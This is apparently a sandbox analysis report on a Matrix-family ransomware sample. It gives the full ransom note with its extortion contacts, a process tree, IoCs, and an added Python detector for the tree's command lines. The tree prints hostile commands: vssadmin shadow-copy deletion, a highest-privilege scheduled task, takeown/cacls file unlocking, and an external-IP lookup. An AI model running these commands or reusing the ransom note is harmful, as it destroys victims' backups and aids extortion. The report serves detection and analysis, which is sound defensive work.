Resubmissions

03-04-2024 17:37

240403-v68g6sga2w 10

Analysis

  • max time kernel
    172s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64  arch:x86  image:win7-20240221-en  locale:en-us  os:windows7-x64  system
  • submitted
    03-04-2024 17:37

General

  • Target

    FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

  • Size

    1.2MB

  • MD5

    607d292bdcdde297252e002e613282ae

  • SHA1

    0161d2dd582d064f7e7f50ccb43478ff0884916a

  • SHA256

    0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

  • SHA512

    2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

  • SSDEEP

    24576:J/SA+2lraRrjSJR5ezmT1dM9bB5slYQt2e8F/KpXcd:PXlOslYQt+5

Malware Config

Extracted

Language
ps1 (deobfuscated)
URLs
ps1.dropper: http://myexternalip.com/raw

Extracted

Path

C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf

Ransom Note

(Rendered as plain text from the RTF. The original is a cp1251 RTF; from "ALTERNATIVE COMMUNICATION" onward it spells Latin words with Cyrillic homoglyphs, \'e0 \'e5 \'ee \'f3 \'f1 \'d1 standing in for a e o y c C, a common trick against keyword matching. Wording and spelling are left exactly as in the note.)

HOW TO RECOVER YOUR FILES INSTRUCTION

ATENTION!!!
We are realy sorry to inform you that ALL YOUR FILES WERE ENCRYPTED
by our automatic software. It became possible because of bad server security.
ATENTION!!!
Please don't worry, we can help you to RESTORE your server to original
state and decrypt all your files quickly and safely!

INFORMATION!!!
Files are not broken!!!
Files were encrypted with AES-128+RSA-2048 crypto algorithms.
There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!
* Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!
* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.

HOW TO RECOVER FILES???
Please write us to the e-mail (write on English or use professional translator):
[email protected]
[email protected]
[email protected]
You have to send your message on each of our 3 emails due to the fact that the message may not reach their intended recipient for a variety of reasons!

In subject line write your personal ID:
1A4EDB7059B3CF0E
We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files.
* Please note that files must not contain any valuable information and their total size must be less than 5Mb.

OUR ADVICE!!!
Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.

We will definitely reach an agreement ;) !!!

ALTERNATIVE COMMUNICATION
If you did not receive the answer from the aforecited emails for more then 24 hours please send us Bitmessages from a web browser through the webpage https://bitmsg.me. Below is a tutorial on how to send bitmessage via web browser:
1. Open in your browser the link https://bitmsg.me/users/sign_up and make the registration by entering name email and password.
2. You must confirm the registration, return to your email and follow the instructions that were sent to you.
3. Return to site and click "Login" label or use link https://bitmsg.me/users/sign_in, enter your email and password and click the "Sign in" button.
4. Click the "Create Random address" button.
5. Click the "New massage" button.
6. Sending message:
To: Enter address: BM-2cUPmiEDYswzWC3ZmbtybDJeUNHqSpERL1
Subject: Enter your ID: 1A4EDB7059B3CF0E
Message: Describe what you think necessary.
Click the "Send message" button.

beYlZx7s   (this last token is set in colour table entry 5, white, so it is invisible when the note is opened)
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops desktop.ini file(s) 40 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe"
      2⤵
      PID:1132
    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe
      "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe" -n
      2⤵
      • Executes dropped EXE
      PID:2556
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zAKPkVIO.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2856
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aOCOlY2e.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aOCOlY2e.bmp" /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:664
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
        3⤵
        PID:1844
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        3⤵
        PID:1620
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\SysWOW64\wscript.exe
        wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat" /sc minute /mo 5 /RL HIGHEST /F
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1580
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat" /sc minute /mo 5 /RL HIGHEST /F
            5⤵
            • Creates scheduled task(s)
            PID:2612
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
          4⤵
          PID:1592
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Run /I /tn DSHCA
            5⤵
            PID:1760
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\u94YVmPq.bat" "C:\pagefile.sys""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Windows\SysWOW64\attrib.exe
        attrib -R -A -S "C:\pagefile.sys"
        3⤵
        • Views/modifies file attributes
        PID:1544
      • C:\Windows\SysWOW64\cacls.exe
        cacls "C:\pagefile.sys" /E /G Admin:F /C
        3⤵
        PID:1620
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\pagefile.sys"
        3⤵
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:396
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c zgNRceKN.exe -accepteula "pagefile.sys" -nobanner
        3⤵
        • Loads dropped DLL
        PID:2704
        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zgNRceKN.exe
          zgNRceKN.exe -accepteula "pagefile.sys" -nobanner
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1852
          • C:\Users\Admin\AppData\Local\Temp\zgNRceKN64.exe
            zgNRceKN.exe -accepteula "pagefile.sys" -nobanner
            5⤵
            • Drops file in Drivers directory
            • Sets service image path in registry
            • Executes dropped EXE
            • Enumerates connected drives
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: LoadsDriver
            • Suspicious use of AdjustPrivilegeToken
            PID:2860
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {995D16FF-817D-40CA-8BA0-E35CBD8DC6EC} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]
    1⤵
    PID:2808
    • C:\Windows\SYSTEM32\cmd.exe
      C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat"
      2⤵
      PID:1620
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1200
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2316
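The tree above is the whole playbook in command lines: the sample copies itself, fetches the victim's external IP with a PowerShell one-liner, swaps the wallpaper through reg.exe, has a VBS create and immediately run a scheduled task (DSHCA, every 5 minutes, /RL HIGHEST) whose batch file deletes every shadow copy, and unlocks each target file with attrib, cacls and takeown plus a dropped helper run with Sysinternals-style -accepteula/-nobanner switches. Every one of those steps is a plain-text command line, which is what makes the chain detectable from process-creation telemetry. The following is an added example, not part of the sandbox report: a small Python detector run over constructed Sysmon-EID-1-style records whose command lines are copied from the tree (plus two constructed benign launches). The ATT&CK technique IDs are my own mapping; the page lists TTP counts but not IDs.

```python
"""Behavioural detection over the process tree above.

Added example, not part of the sandbox report. The records are constructed
Sysmon-EID-1-style process-creation events whose command lines are copied from
the Processes section of this page (plus two constructed benign records); the
ATT&CK technique IDs are my own mapping, not the sandbox's.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    cmdline: str


# Command lines copied from the report; PIDs 4000/4001 are constructed benign
# launches included to show what the rules must NOT fire on.
SAMPLE_EVENTS = [
    ProcEvent(2556, r'''"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe" -n'''),
    ProcEvent(2824, r'''"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zAKPkVIO.txt"'''),
    ProcEvent(2856, r'''powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"'''),
    ProcEvent(1780, r'''"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aOCOlY2e.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f'''),
    ProcEvent(664, r'''reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aOCOlY2e.bmp" /f'''),
    ProcEvent(1844, r'''reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f'''),
    ProcEvent(936, r'''"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs"'''),
    ProcEvent(1624, r'''wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs"'''),
    ProcEvent(1580, r'''"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat" /sc minute /mo 5 /RL HIGHEST /F'''),
    ProcEvent(2612, r'''schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat" /sc minute /mo 5 /RL HIGHEST /F'''),
    ProcEvent(1544, r'''attrib -R -A -S "C:\pagefile.sys"'''),
    ProcEvent(1620, r'''cacls "C:\pagefile.sys" /E /G Admin:F /C'''),
    ProcEvent(396, r'''takeown /F "C:\pagefile.sys"'''),
    ProcEvent(1200, r'''vssadmin Delete Shadows /All /Quiet'''),
    ProcEvent(4000, r'''"C:\Windows\System32\notepad.exe" C:\Users\Admin\notes.txt'''),
    ProcEvent(4001, r'''schtasks /Create /tn "Nightly Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'''),
]

# (technique ID, description, pattern matched against the full command line)
RULES = [
    ("T1490", "shadow copies deleted with vssadmin",
     re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b', re.I)),
    ("T1053.005", "scheduled task runs a script out of AppData\\Roaming at the highest run level",
     re.compile(r'\bschtasks(?:\.exe)?\s+/create\b.*\\AppData\\Roaming\\[^"\s]+\.(?:bat|cmd|vbs|ps1)\b.*/rl\s+highest\b', re.I)),
    ("T1491.001", "desktop wallpaper replaced through the registry",
     re.compile(r'\breg(?:\.exe)?\s+add\s+"HKCU\\Control Panel\\Desktop"\s+/v\s+Wallpaper\b', re.I)),
    ("T1016", "external IP looked up from PowerShell",
     re.compile(r'\bpowershell\b.*\bmyexternalip\.com\b', re.I)),
    ("T1222.001", "file ownership/ACL changed with takeown, cacls or icacls",
     re.compile(r'\b(?:takeown|cacls|icacls)(?:\.exe)?\s+', re.I)),
    ("T1059.005", "wscript launched in batch (hidden) mode",
     re.compile(r'\bwscript(?:\.exe)?\s+//b\b', re.I)),
]


def detect(events: list[ProcEvent]) -> dict[str, list[int]]:
    """Map technique ID -> PIDs whose command line matched, in event order.
    A cmd.exe /C wrapper matches alongside its child on purpose: the wrapper
    is the hop you walk back through to reach the dropper."""
    hits: dict[str, list[int]] = {}
    for ev in events:
        for technique, _desc, pattern in RULES:
            if pattern.search(ev.cmdline):
                hits.setdefault(technique, []).append(ev.pid)
    return hits


def triage(events: list[ProcEvent], threshold: int = 3) -> dict:
    """One behaviour on its own (a wallpaper change, a single takeown) is
    everyday noise; several distinct ones in one tree is the pattern above."""
    hits = detect(events)
    return {
        "rules_fired": len(hits),
        "verdict": "ransomware-like" if len(hits) >= threshold else "inconclusive",
        "pids": sorted({pid for pids in hits.values() for pid in pids}),
    }


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for technique, desc, _ in RULES:
        print(f"{technique:<10} {desc}: {hits.get(technique, [])}")
    print(triage(SAMPLE_EVENTS))
```

The schtasks rule deliberately keys on the combination (script under AppData\Roaming plus /RL HIGHEST) rather than on schtasks alone, so the constructed nightly-backup task does not fire, and the wallpaper rule uses a word boundary so the WallpaperStyle and TileWallpaper writes are not double-counted. Note that PID 1620 is reused twice in the sandbox tree (a reg.exe child, the cacls launch and the cmd.exe under taskeng); real telemetry needs the process GUID or start time, not the PID, as the key.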

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf
    Filesize: 8KB
    MD5: cff30227536e37da97ae89d97f68577c
    SHA1: 995801f8d0a9464e851ad485d25b1a75db19a484
    SHA256: 2913a2b99a254fde216c8364c0d6794cff7106f767d65fc339523dad3359a5e4
    SHA512: 9aed0bcc9ad7253c2f735c02cb960748fb84755729c45ab4dcc545fb903907848c4976d3e3bb4bb2df0c75cdc98875e8d56850e149e5467305174b6c986b10c9

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe (byte-identical copy of the submitted sample; same hashes as in General)
    Filesize: 1.2MB
    MD5: 607d292bdcdde297252e002e613282ae
    SHA1: 0161d2dd582d064f7e7f50ccb43478ff0884916a
    SHA256: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65
    SHA512: 2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1A4EDB7059B3CF0E.txt (dumped twice at different sizes; the suffix is the victim ID from the ransom note)
    Filesize: 1KB
    MD5: e87e7241839c3a978c9027d1b73cc863
    SHA1: 50a150c32dc5b2244d1a8d81a31562d85bd53f46
    SHA256: 7e256bdb89688daff00f7c9d1ac74db7e9e842163231cc890a494ed72011502c
    SHA512: d38237650fb632fed7947a4da2bb41c911eaf6068db297da3140e48af77ff947e94d9b2f884b420db1e7cc1c5fe5ea6941f8052331898ae9f2bb10897b1945ba

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1A4EDB7059B3CF0E.txt
    Filesize: 12KB
    MD5: 14a1daab52fcf74fc5ae275cd887a444
    SHA1: 67ba4484998a4c3d9e69f1073fe79489fdf7de75
    SHA256: 853e1fb0db07025ff8807264e00076378151479ef1a50bf404f3934b674ade32
    SHA512: 16dda5fbf4008b2b0320b0126b410e19d4e92ca9c2b2add68cb4ef2a0690b8cabab9233953a6b564f3f710dd56ef2b961177fdf2265c56829062fa3acc6cf33b

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\u94YVmPq.bat (per-file unlock script: attrib, cacls, takeown, then zgNRceKN.exe, as in the process tree)
    Filesize: 246B
    MD5: 04fdf36635621eedd8c3aeae08a644e2
    SHA1: c95f9d260590bc08c7955341bb1a66c947e0fb28
    SHA256: 53522830e25a5a32666877a7a6e5dc44576ba1320f253f62d2756ca8aa901756
    SHA512: 704a0cd0c1a90fc2f60601c7a31ce8f76ef9301725698de0f52866883f54ec973f9c96004cba958519e2ca8350952c692d26b2271bfb781b6566eeb93d915111

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zAKPkVIO.txt (stdout of the myexternalip.com PowerShell one-liner)
    Filesize: 16B
    MD5: 17d432845dc7cb55ac69d75cf72f7f5d
    SHA1: 7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
    SHA256: a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
    SHA512: 25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zgNRceKN.exe
    Filesize: 181KB
    MD5: 2f5b509929165fc13ceab9393c3b911d
    SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
    SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
    SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

  • C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs (creates and runs the DSHCA scheduled task)
    Filesize: 260B
    MD5: 420a07b06774918f84eee2b11f9b0123
    SHA1: e271b2bb3fd8f9205b866dc601ef1c380f1b7e55
    SHA256: c07fc83d027e916eace536ac695e881869501192b9a52c0574dc1945643ddac8
    SHA512: d6548746aee6d9c34338bb74540edebd65e189c1794e24bd9607c7a356f391a811da4a268c996cbf64a1e0db60deef9498886f97e04ba9b5001fb7057b4b7427

  • C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat (scheduled-task payload; runs vssadmin Delete Shadows /All /Quiet)
    Filesize: 265B
    MD5: b009ce341978a0c05283d2f573e09fb6
    SHA1: 37487521b61bc27a9e41b79be2305042d16ad813
    SHA256: 4fe20e1e7ede202305bed1bf030758144ce9244aff704543df69f4c5b99f3738
    SHA512: dd045f01c65d5ae0c81e55bd8a44ef71ce0b494c14a93a16e645e283d0fb940ce96e69336d683278e125c51c038304b7c6bd4a17be3d4ee61114fba0062d7fe9

  • \Users\Admin\AppData\Local\Temp\zgNRceKN64.exe (64-bit helper dropped by zgNRceKN.exe; loads a driver and sets a service image path)
    Filesize: 221KB
    MD5: 3026bc2448763d5a9862d864b97288ff
    SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
    SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
    SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

  • memory/1852-2151-0x0000000000400000-0x0000000000477000-memory.dmp (476KB)
  • memory/1852-1838-0x0000000000400000-0x0000000000477000-memory.dmp (476KB)
  • memory/2100-4292-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2100-18-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2100-9408-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2100-1836-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2100-9288-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2100-2149-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2100-9210-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2100-4877-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2556-8-0x0000000000400000-0x000000000053F000-memory.dmp (1.2MB)
  • memory/2704-4533-0x0000000000170000-0x00000000001E7000-memory.dmp (476KB)
  • memory/2704-1837-0x0000000000170000-0x00000000001E7000-memory.dmp (476KB)
  • memory/2856-15-0x0000000002100000-0x0000000002140000-memory.dmp (256KB)
  • memory/2856-11-0x0000000073810000-0x0000000073DBB000-memory.dmp (5.7MB)
  • memory/2856-12-0x0000000073810000-0x0000000073DBB000-memory.dmp (5.7MB)
  • memory/2856-14-0x0000000002100000-0x0000000002140000-memory.dmp (256KB)
  • memory/2856-13-0x0000000002100000-0x0000000002140000-memory.dmp (256KB)
  • memory/2856-16-0x0000000073810000-0x0000000073DBB000-memory.dmp (5.7MB)
                    5.7MB